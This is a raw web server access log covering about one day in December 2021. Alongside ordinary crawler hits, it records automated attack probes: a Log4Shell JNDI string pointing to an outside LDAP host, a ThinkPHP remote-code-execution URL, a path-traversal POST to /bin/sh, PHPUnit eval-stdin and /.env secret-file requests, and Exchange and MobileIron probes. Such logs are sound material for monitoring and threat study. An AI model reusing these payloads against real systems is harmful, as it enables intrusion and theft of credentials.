[15/Dec/2021:01:06:08 +0100] 66.240.236.116 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:01:22:55 +0100] 77.74.177.119 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:01:44:56 +0100] 34.96.130.24 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 394
[15/Dec/2021:02:05:33 +0100] 192.241.212.131 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[15/Dec/2021:02:05:35 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[15/Dec/2021:02:06:26 +0100] 192.241.207.72 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[15/Dec/2021:02:08:02 +0100] 198.199.95.200 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[15/Dec/2021:02:31:44 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327
[15/Dec/2021:02:51:15 +0100] 183.136.225.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:02:51:47 +0100] 183.136.225.9 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:02:52:01 +0100] 183.136.225.9 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 308
[15/Dec/2021:03:20:59 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /mifs/.;/services/LogService HTTP/1.1" 318
[15/Dec/2021:03:35:04 +0100] 83.136.32.58 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.0" -
[15/Dec/2021:04:03:20 +0100] 192.241.211.149 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[15/Dec/2021:04:18:56 +0100] 192.241.212.19 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[15/Dec/2021:04:53:48 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[15/Dec/2021:05:04:09 +0100] 106.122.206.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk= HTTP/1.1" 429
[15/Dec/2021:05:08:26 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /console/ HTTP/1.1" 307
[15/Dec/2021:06:00:26 +0100] 106.122.206.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd= HTTP/1.1" 436
[15/Dec/2021:06:16:02 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:06:16:56 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[15/Dec/2021:06:17:02 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[15/Dec/2021:06:17:02 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[15/Dec/2021:06:17:06 +0100] 185.142.236.43 TLSv1.2 AES256-SHA "quit" 379
[15/Dec/2021:06:17:12 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[15/Dec/2021:06:17:13 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[15/Dec/2021:06:17:13 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[15/Dec/2021:06:17:16 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[15/Dec/2021:06:17:18 +0100] 185.142.236.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[15/Dec/2021:06:24:32 +0100] 162.142.125.41 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[15/Dec/2021:06:24:32 +0100] 162.142.125.41 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:06:48:32 +0100] 193.106.29.210 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:07:00:12 +0100] 124.224.87.11 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:07:00:14 +0100] 124.224.87.11 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:07:00:15 +0100] 124.224.87.11 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:07:00:17 +0100] 124.224.87.11 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:07:12:06 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:07:58:32 +0100] 106.122.206.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /wp-content/plugins/kaswara/front/assets/css/style.css HTTP/1.1" 430
[15/Dec/2021:09:26:12 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 293
[15/Dec/2021:10:21:13 +0100] 207.46.13.127 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[15/Dec/2021:10:27:50 +0100] 128.1.248.42 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[15/Dec/2021:11:43:41 +0100] 67.205.158.245 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /users/sign_in HTTP/1.1" 396
[15/Dec/2021:12:45:17 +0100] 51.222.253.12 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 304
[15/Dec/2021:12:45:18 +0100] 54.36.148.134 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 297
[15/Dec/2021:12:54:31 +0100] 184.105.247.194 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[15/Dec/2021:13:48:01 +0100] 192.241.211.154 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[15/Dec/2021:14:01:38 +0100] 103.247.21.18 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /users/sign_in HTTP/1.1" 396
[15/Dec/2021:14:09:11 +0100] 60.217.75.69 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:15:49:01 +0100] 51.222.253.8 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 302
[15/Dec/2021:15:49:04 +0100] 54.36.149.27 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[15/Dec/2021:15:55:13 +0100] 113.98.224.68 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:15:55:21 +0100] 113.98.224.68 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:15:55:22 +0100] 113.98.224.68 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:15:55:22 +0100] 113.98.224.68 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:16:34:54 +0100] 167.248.133.60 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[15/Dec/2021:16:34:55 +0100] 167.248.133.60 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:17:54:16 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[15/Dec/2021:17:54:17 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[15/Dec/2021:19:24:46 +0100] 128.14.134.134 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[15/Dec/2021:20:27:59 +0100] 146.56.148.181 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 430
[15/Dec/2021:20:28:01 +0100] 146.56.148.181 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:20:28:04 +0100] 146.56.148.181 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /login HTTP/1.1" 388
[15/Dec/2021:20:28:05 +0100] 146.56.148.181 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[15/Dec/2021:20:37:24 +0100] 207.46.13.127 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[15/Dec/2021:21:20:45 +0100] 138.246.253.24 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 393
[15/Dec/2021:21:21:48 +0100] 208.100.26.233 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 298
[15/Dec/2021:21:33:03 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[15/Dec/2021:21:50:24 +0100] 178.62.208.238 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[15/Dec/2021:21:51:33 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[15/Dec/2021:22:56:11 +0100] 83.136.32.58 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.0" -
[15/Dec/2021:23:07:06 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327
[15/Dec/2021:23:14:19 +0100] 137.226.113.44 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 308
[15/Dec/2021:23:24:34 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /mifs/.;/services/LogService HTTP/1.1" 318
[15/Dec/2021:23:49:17 +0100] 185.180.143.8 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[15/Dec/2021:23:59:45 +0100] 106.75.223.168 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 383
[16/Dec/2021:00:35:05 +0100] 109.237.103.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[16/Dec/2021:00:35:06 +0100] 109.237.103.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[16/Dec/2021:00:49:12 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /console/ HTTP/1.1" 307
[16/Dec/2021:00:56:01 +0100] 130.211.54.158 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301